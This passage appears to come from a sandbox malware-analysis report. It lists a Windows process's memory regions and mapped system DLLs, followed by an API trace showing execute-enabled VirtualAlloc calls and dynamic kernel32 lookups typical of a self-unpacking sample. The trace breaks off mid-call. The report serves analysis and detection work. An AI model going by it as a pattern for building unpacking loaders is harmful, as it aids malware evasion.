region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5289 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5290 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5291 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5292 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5293 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5294 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5295 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5296 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5297 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5298 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5299 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5300 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5301 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5302 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5303 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5304 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5305 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5306 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5307 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5308 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5309 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5310 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5311 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5312 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 5313 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5314 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5315 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5316 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5317 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5318 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5319 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5320 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5321 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5322 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5323 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5324 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5325 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5326 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5340 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5344 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5345 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5346 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5347 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5348 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5349 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5350 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 5351 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5352 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5353 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5354 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5355 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5356 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5357 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5358 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5359 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5360 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5361 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5362 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5363 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5364 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5365 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5366 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5367 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5368 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5369 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5370 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5371 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5372 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5373 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5374 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5375 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5376 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5377 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5378 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5379 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5380 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5381 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5382 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5383 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5384 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5385 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5386 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5387 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5388 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5389 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5390 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5391 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5392 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5393 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5394 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5395 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5396 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5397 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5398 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5399 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5400 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5401 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5402 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5403 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5404 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5405 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5406 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5407 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5408 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5409 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5410 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5411 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5412 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5413 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5414 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5415 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5416 start_va = 0x3440000 end_va = 0x3492fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5417 start_va = 0x2110000 end_va = 0x2113fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5418 start_va = 0x3440000 end_va = 0x3457fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 5419 start_va = 0x2110000 end_va = 0x2113fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5420 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5421 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5422 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5423 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5424 start_va = 0x2110000 end_va = 0x2110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5425 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5426 start_va = 0x2110000 end_va = 0x2114fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5427 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5428 start_va = 0x2110000 end_va = 0x2113fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5429 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 5430 start_va = 0x2110000 end_va = 0x211afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 5450 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 5454 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 5455 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 5456 start_va = 0x740a0000 end_va = 0x74194fff monitored = 0 entry_point = 0x740b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 5457 start_va = 0x2660000 end_va = 0x2661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 5458 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 5459 start_va = 0x2710000 end_va = 0x2710fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 5460 start_va = 0x27c0000 end_va = 0x27c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 5461 start_va = 0x2710000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 5462 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5463 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003440000" filename = "" Region: id = 5464 start_va = 0x745b0000 end_va = 0x745d0fff monitored = 0 entry_point = 0x745b145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 5465 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 5468 start_va = 0x3450000 end_va = 0x3453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5469 start_va = 0x3460000 end_va = 0x3476fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 5470 start_va = 0x3480000 end_va = 0x3480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003480000" filename = "" Region: id = 5471 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5472 start_va = 0x3450000 end_va = 0x3453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5473 start_va = 0x3490000 end_va = 0x34bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 5474 start_va = 0x34c0000 end_va = 0x34c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5475 start_va = 0x34d0000 end_va = 0x3535fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 5476 start_va = 0x3540000 end_va = 0x354dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 5477 start_va = 0x3550000 end_va = 0x3550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003550000" filename = "" Region: id = 5479 start_va = 0x3560000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 5480 start_va = 0x35a0000 end_va = 0x369ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 5481 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 5482 start_va = 0x36a0000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 5483 start_va = 0x36e0000 end_va = 0x37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 5484 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 5502 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 5503 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5504 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 5505 start_va = 0x37e0000 end_va = 0x37ecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 5531 start_va = 0x37f0000 end_va = 0x382ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 5532 start_va = 0x3830000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 5533 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 5552 start_va = 0x753c0000 end_va = 0x753d1fff monitored = 0 entry_point = 0x753c1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 204 os_tid = 0xc84 [0258.276] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x290000 [0260.001] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x1fb0000 [0260.007] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.029] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0260.029] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0260.029] VirtualAlloc (lpAddress=0x0, dwSize=0x546, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0260.029] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.030] VirtualAlloc (lpAddress=0x0, dwSize=0x44400, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0260.140] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.146] VirtualAlloc (lpAddress=0x0, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0260.146] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.147] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0260.148] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.149] VirtualAlloc (lpAddress=0x0, dwSize=0x3400, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0260.150] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0260.151] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0260.151] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0260.151] GetProcAddress (hModule=0x769b0000, 